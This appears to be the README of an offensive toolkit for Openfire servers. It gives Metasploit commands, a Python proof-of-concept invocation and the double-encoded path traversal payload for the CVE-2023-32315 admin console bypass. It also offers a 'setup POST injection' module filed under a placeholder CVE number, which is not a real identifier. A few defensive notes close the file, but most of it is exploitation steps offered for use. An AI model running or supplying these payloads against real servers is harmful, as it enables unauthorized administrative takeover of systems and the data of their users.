index.md

Openfire Exploit Suite

🔥 Overview

Openfire Exploit Suite provides recon → PoC → Metasploit exploitation tooling for:

• CVE-2023-32315 (Admin Console Auth Bypass)
• Placeholder CVE-2023-XXXX (Residual setup POST endpoint abuse)

🧩 Modules

• exploit-core/: Python PoC for admin bypass.
• metasploit-module/: Ruby modules (bypass + setup POST injection).
• burp-automation/: Minimal Burp Extender.
• recon-tools/: Automated scanning + report generation.

🩸 Metasploit Modules

Admin bypass:

use exploit/linux/http/openfire_admin_bypass
set RHOSTS <target>
run

Unauth setup POST:

use exploit/linux/http/openfire_setup_unauth
set RHOSTS <target>
set TARGETURI /setup/setup-someform.jsp
run

Module directory:

metasploit-module/exploits/linux/http/

Local load (if not copied into framework tree):

loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits
reload_all

🚀 CVE-2023-32315 Summary

Double-encoded traversal to reach admin login:

/setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp

🛠 Recon Flow

cd recon-tools
./run_recon.sh <target-ip>

Generates: nmap_full_scan.txt, ffuf_results.html, nikto_results.txt, recon_report.md / HTML variants.

🐍 Python PoC

python3 exploit-core/openfire_exploit.py --target http://<target-ip>:9090

🧠 Burp Extender

Entry: burp-automation/src/main/java/burp/BurpExtender.java Build:

cd burp-automation
./gradlew clean build

📂 Repo Slimming

Key .gitignore patterns exclude Bundler, logs, coverage, native objects, IDE caches. Optionally extend to large output/ artifacts.

🔐 Defensive Notes

• Upgrade to ≥ 4.6.9
• Remove/lock /setup/ after install
• Block double-encoded traversal at edge
• Monitor access to legacy setup JSPs

📣 Credits

Research & tooling by Taka (2025). Use responsibly.